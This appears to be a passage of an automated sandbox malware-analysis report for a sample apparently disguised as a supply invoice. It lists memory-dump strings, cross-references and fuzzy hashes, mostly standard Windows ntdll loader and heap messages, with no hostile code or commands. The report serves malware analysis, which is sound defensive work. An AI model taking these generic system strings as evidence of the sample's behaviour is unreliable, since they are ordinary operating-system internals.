                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01772412
                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01772602
                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01772624
                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017724C0
                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01772409
                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01772506
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                • Opcode ID: 49571885eec130a00ad376f819570a319c205faa7b74f2ace7aba778167f403b
                                                                                                                                • Instruction ID: 209e66f29b2a47a94a3d12adfaa8a4192a0fb3e74b26f569f4ab25df939ec84b
                                                                                                                                • Opcode Fuzzy Hash: 49571885eec130a00ad376f819570a319c205faa7b74f2ace7aba778167f403b
                                                                                                                                • Instruction Fuzzy Hash: 4E025FF1D042299BDF21DB54CC84B9AF7B8AB54714F0041EAE619A7243EB309F84CF99
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                • Opcode ID: c7f06f528127b01df916302cb5b1d64afe2d02d72a471deb46c94b9cc49718bf
                                                                                                                                • Instruction ID: fc54804f5ac63a9fad4e4ae3019f31109fe5bab0d9014b257b2650179d306853
                                                                                                                                • Opcode Fuzzy Hash: c7f06f528127b01df916302cb5b1d64afe2d02d72a471deb46c94b9cc49718bf
                                                                                                                                • Instruction Fuzzy Hash: F251C0715043119BC329DF288848BABFBE8EFD8255F944A6DE999C3241E770D644CBD3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                • Opcode ID: e15ec20bfd35f2920d3650d6a70c8d0f32b10ab5646873f84571b37331e155dc
                                                                                                                                • Instruction ID: 7e04ff430cef11b732bb2b15b4958960228f05f1bc2bd387d5d7b254a834aaf2
                                                                                                                                • Opcode Fuzzy Hash: e15ec20bfd35f2920d3650d6a70c8d0f32b10ab5646873f84571b37331e155dc
                                                                                                                                • Instruction Fuzzy Hash: 23D1B9315002869FDB26DF68C884BEAFBF2FF4A714F18805DF5469B652C7349981CB14
                                                                                                                                Strings
                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01788A3D
                                                                                                                                • VerifierDebug, xrefs: 01788CA5
                                                                                                                                • HandleTraces, xrefs: 01788C8F
                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01788B8F
                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01788A67
                                                                                                                                • VerifierDlls, xrefs: 01788CBD
                                                                                                                                • VerifierFlags, xrefs: 01788C50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                • Opcode ID: 48c5e674c90f98f3171eb2433c3b99133328931f59db85be37ebe959c8453582
                                                                                                                                • Instruction ID: cb3dab52c9f20cdacb0db1ddd68e11680c3189a800acc9789b8b49869e5febf7
                                                                                                                                • Opcode Fuzzy Hash: 48c5e674c90f98f3171eb2433c3b99133328931f59db85be37ebe959c8453582
                                                                                                                                • Instruction Fuzzy Hash: EE9136B16897129FD321FF28C884F1BFBE4AB94724F85455CFA41AB285C7709D01C796
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                • API String ID: 0-1109411897
                                                                                                                                • Opcode ID: 407535bfead1f840bb063eee2a3f2ae19900fc49772ffe0ce667709b860a9686
                                                                                                                                • Instruction ID: 54113bae73ddb294263b99d80244042e8f0598cbe194577464e900e6c313697e
                                                                                                                                • Opcode Fuzzy Hash: 407535bfead1f840bb063eee2a3f2ae19900fc49772ffe0ce667709b860a9686
                                                                                                                                • Instruction Fuzzy Hash: FFA22774A0562ACFDB75DF19CD887A9FBB5AF49304F1442E9D90AA7290DB309E85CF00
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-792281065
                                                                                                                                • Opcode ID: f6ee2a1d4a42d03a2fcf369b424b615f164fbc2eed7de47ad9de400e7343095a
                                                                                                                                • Instruction ID: 736b083a5ce269a9998410f8a5347a01e2d37441841b1695b784351fed6cd8a5
                                                                                                                                • Opcode Fuzzy Hash: f6ee2a1d4a42d03a2fcf369b424b615f164fbc2eed7de47ad9de400e7343095a
                                                                                                                                • Instruction Fuzzy Hash: 19914A70F41315ABDF35EF58DC88BAAFBA1BB40724F10416CF9126B286D7709A41C791
                                                                                                                                Strings
                                                                                                                                • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01759A2A
                                                                                                                                • Getting the shim user exports failed with status 0x%08lx, xrefs: 01759A01
                                                                                                                                • apphelp.dll, xrefs: 016F6496
                                                                                                                                • LdrpInitShimEngine, xrefs: 017599F4, 01759A07, 01759A30
                                                                                                                                • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 017599ED
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01759A11, 01759A3A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-204845295
                                                                                                                                • Opcode ID: 5ab60a2323babbb42192330ef544cb204ade012eb64878e00a2534a94358b6e1
                                                                                                                                • Instruction ID: 6ac2428d054769c7e05b1aa004293e299b1acab030aaf61c5ba5cb9ed4d9a22b
                                                                                                                                • Opcode Fuzzy Hash: 5ab60a2323babbb42192330ef544cb204ade012eb64878e00a2534a94358b6e1
                                                                                                                                • Instruction Fuzzy Hash: 0351C371248305DFE724DF24CC95BABB7E9FB84658F00491DFA869B154DB70EA04CBA2
                                                                                                                                Strings
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017721BF
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01772178
                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01772160, 0177219A, 017721BA
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01772165
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01772180
                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0177219F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                • API String ID: 0-861424205
                                                                                                                                • Opcode ID: 8a4203400e78c74c71da4ef0fabbaca2ff8da2fdf748a9d28f403b1eaafaa38d
                                                                                                                                • Instruction ID: b72f5d8edd7a7f7e3e7b27ebfd643e21012ce80daeef5096d14d9ec7115d4e9b
                                                                                                                                • Opcode Fuzzy Hash: 8a4203400e78c74c71da4ef0fabbaca2ff8da2fdf748a9d28f403b1eaafaa38d
                                                                                                                                • Instruction Fuzzy Hash: 34313736F4121577EB229A999C45F5BFBB8FBA5A90F0501A9FB0567243D2709E00C3E0
                                                                                                                                Strings
                                                                                                                                • LdrpInitializeProcess, xrefs: 0173C6C4
                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01778177, 017781EB
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01778181, 017781F5
                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017781E5
                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01778170
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0173C6C3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 0-475462383
                                                                                                                                • Opcode ID: 0d13f238325bac7dba3b13bbe12bc54cb695f9ee0b615657eb7628d81fd1976d
                                                                                                                                • Instruction ID: d34d51b1804a8d7d818d09b70db97988a31b7bebf4e1f2aa3d453d5b709494bd
                                                                                                                                • Opcode Fuzzy Hash: 0d13f238325bac7dba3b13bbe12bc54cb695f9ee0b615657eb7628d81fd1976d
                                                                                                                                • Instruction Fuzzy Hash: 4731E4726443469BC324EB28DC4DE2BF7E4EF94B24F05055CF945AB395DA20ED05C7A2
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 01742DF0: LdrInitializeThunk.NTDLL ref: 01742DFA
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BA3
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BB6
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D60
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D74
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                • API String ID: 0-379654539
                                                                                                                                Strings
                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0173855E
                                                                                                                                • @, xrefs: 01738591
                                                                                                                                • LdrpInitializeProcess, xrefs: 01738422
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01738421
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                Strings
                                                                                                                                • .Local, xrefs: 017328D8
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017721DE
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017722B6
                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017721D9, 017722B1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                Strings
                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01773437
                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0177342A
                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01773425, 01773432, 01773451
                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01773456
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                • API String ID: 0-1245972979
                                                                                                                                Strings
                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01761028
                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01760FE5
                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017610AE
                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0176106B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                Strings
                                                                                                                                • LdrpDynamicShimModule, xrefs: 0176A998
                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0176A992
                                                                                                                                • apphelp.dll, xrefs: 01722462
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0176A9A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-176724104
                                                                                                                                Strings
                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0171327D
                                                                                                                                • HEAP[%wZ]: , xrefs: 01713255
                                                                                                                                • HEAP: , xrefs: 01713264
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                • API String ID: 0-617086771
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $@
                                                                                                                                • API String ID: 0-1077428164
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                Strings
                                                                                                                                • LdrpCheckModule, xrefs: 0176A117
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0176A121
                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0176A10F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-161242083
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-1334570610
                                                                                                                                Strings
                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017782DE
                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 017782D7
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017782E8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-1783798831
                                                                                                                                Strings
                                                                                                                                • @, xrefs: 017BC1F1
                                                                                                                                • PreferredUILanguages, xrefs: 017BC212
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017BC1C5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                • API String ID: 0-2968386058
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                • API String ID: 0-1373925480
                                                                                                                                Strings
                                                                                                                                • LdrpCheckRedirection, xrefs: 0178488F
                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01784888
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01784899
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 0-3154609507
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-2558761708
                                                                                                                                Strings
                                                                                                                                • LdrpInitializationFailure, xrefs: 017820FA
                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017820F3
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01782104
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-2986994758
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
